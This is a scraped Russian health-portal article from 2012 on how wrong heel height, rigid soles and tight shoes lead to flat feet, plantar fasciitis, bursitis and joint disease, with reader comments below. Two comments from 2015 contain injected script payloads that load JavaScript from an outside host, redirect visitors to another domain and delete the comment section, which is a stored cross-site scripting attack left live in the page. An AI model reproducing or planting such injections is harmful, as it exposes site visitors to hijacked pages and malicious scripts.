Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  К чему приводит неправиль...  >>  К чему приводит неправильная обувь
 
Обратная связь
 

К чему приводит неправильная обувь

Размер шрифта
15 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Елена Фролова
Здоровье инфо
  • google_analytics: false
  • Нравится

Стопа выполняет сложнейшие функции в организме: выдерживает вес тела при ходьбе и беге, амортизирует удары при каждом шаге, отталкивается перед прыжком...

к чему приводит неправильная обувь

Чтобы долгие годы исправно выполнять свою работу, ей необходима правильная обувь. Но что это такое, знает далеко не каждый. Для ребенка, только начинающего ходить, правильная обувь – это твердый задник, поддерживающий лодыжку, и хороший супинатор. Естественно, обувь должна быть подобрана по размеру – пусть для этого ее и приходится часто менять.

Взрослые при выборе обуви для себя ставят во главу угла уже несколько другие параметры: фасон, цвет, цену и потом уже размер, совершенно не ориентируясь на то, насколько полезной для стопы будет такая обувь. Однако неправильная обувь может привести к очень серьезным проблемам. Сейчас среди лиц пожилого возраста практически невозможно найти человека со здоровыми суставами.

Вся правда о каблуках

Пожалуй, главным врагом стопы можно назвать неправильный каблук – слишком низкий или, наоборот, высокий.

«Отрицательный» каблук – это каблук, высота которого ниже остальных частей подошвы (при наличии супинатора, например), либо вообще отсутствие каблука. Для выполнения шага (отжимание) в такой обуви требуется большое напряжение икроножной мышцы, что можно сравнить с подъемом в гору. При ношении обуви с таким каблуком стопа находится в положении вытяжения, подошвенный апоневроз перерастягивается, что приводит к болям, судорогам стопы, а в дальнейшем – к развитию плоскостопия. Перерастяжение и постоянная травматизация подошвенного апоневроза может стать причиной подошвенного фасциита – воспаление этой связки. Заболевание сопровождается болью в области пятки, усиливающейся при нагрузке. На фоне воспаления компенсаторно разрастается кость – образуется пяточная шпора.

Повреждает подошвенный апоневроз и слишком твердая, негнущаяся подошва (платформа, например). Кроме того, такая подошва мешает амортизации, и каждый шаг становится ударом для внутренних органов и межпозвоночных дисков. Результат – остеохондроз, межпозвоночная грыжа, микротрещины в фиброзном кольце межпозвоночных дисков вплоть до спондилоартроза, ущемления нервов (радикулит) и сосудов.

С другой стороны, слишком высокий каблук вынуждает человека переносить центр тяжести корпуса немного назад, вызывая прогиб в поясничном отделе позвоночника. С увеличением высоты каблука центр тяжести падает на точку, все более смещаемую вперед. При очень высоком каблуке вся тяжесть тела приходится на головки плюсневых костей и плюснефаланговые суставы, которые на такую нагрузку просто не рассчитаны. Это приводит к: артритам плюснефаланговых суставов, микротрещинам, ущемлениям нерва, формируется стопа с плоским поперечным сводом (плоскостопие), пальцы стопы деформируются (шишки, молоткообразная деформация), укорачивается ахиллово сухожилие (что может привести к его разрыву при небольшой травме).

Важно! Высота каблука должна быть в пределах 1,5-4 см.

Правильный размер

Следующая проблема заключается в том, что большинство из нас выбирает обувь, по размеру меньше, чем нужно, и часто это именно узкая обувь. Если она еще и на каблуке, то в таких туфлях пальцы буквально вколачиваются в носок, что вызывает сдавление и ухудшение кровоснабжения стопы. Плохое кровоснабжение сразу приводит к проблемам с ногтями: они становятся тонкими, сухими, легко ломаются, врастают. На поврежденные ногти легко «садится» грибок.

Нарушение оттока венозной крови от стопы приводит к отекам, тромбофлебиту, варикозному расширению вен. Кроме того, возможно развитие ахиллобурсита (воспаления суставной сумки, находящейся между ахилловым сухожилием и кожей), ущемления нерва, деформации пальцев.

К ахиллобурситу (задний бурсит ахиллова сухожилия) может привести и слишком твердый задник туфли, травмирующий сустав. Это заболевание характеризуется болью, отечностью сустава, покраснением кожи над суставной сумкой, а также ограничением подвижности сустава.

Проблемы стопы неизменно поднимаются выше – к коленным и тазобедренным суставам. В результате развиваются артриты и остеоартрозы, что приводит пожилых людей к сильнейшим болям и необходимости замены суставов (по статистике, ежегодно один человек из тысячи нуждается в эндопротезировании сустава). Чтобы сохранить здоровье ног и суставов до глубокой старости, для ежедневного ношения нужно выбирать только правильную обувь.

Что такое правильная обувь

Обязательно на широком каблуке высотой 1,5-4 см, сшитая из мягкого, но поддерживающего и пропускающего воздух материала, с хорошим супинатором и достаточно широкая, чтобы пальцы стопы располагались свободно. А красивые туфли на шпильке стоит приберечь для особого случая и носить не более 2-3 часов подряд.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

15 ноября 2012 в 12:46

Цитировать   |   Пожаловаться

"Обязательно на широком каблуке высотой 1,5-4 см, сшитая из мягкого, но поддерживающего и пропускающего воздух материала, с хорошим супинатором и достаточно широкая, чтобы пальцы стопы располагались свободно. А красивые туфли на шпильке стоит приберечь для особого случая и носить не более 2-3 часов подряд.

ведущей это скажите, а то смотреть страшно на ее манипуляции ногами в кадре!

Гость 15 ноября 2012 в 12:46
А красивые туфли на шпильке стоит приберечь для особого случая и носить не более 2-3 часов подряд."  ведущей это скажите, а то смотреть страшно на ее манипуляции ногами в кадре!
 Ведущая конечно же знает, что ей говорить-то. Но она - женщина, и она в кадре, и на время работы в кадре для Вас, дорогие зрители,  надевает красивую обувь с каблуками и изящными мысками. 

3 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
4 движения, чтобы не болели ноги   Неврома Мортона: боль в стопе   Поступь величавая: как ухаживать за стопами   Как избежать плоскостопия  

Слайдшоу

1
Худшая обувь для ваших стоп
Распространенные заболевания стоп
Без нее – ни шагу!

Тесты

Есть ли у вас варикозное расширение вен?
Что вы знаете о раке груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.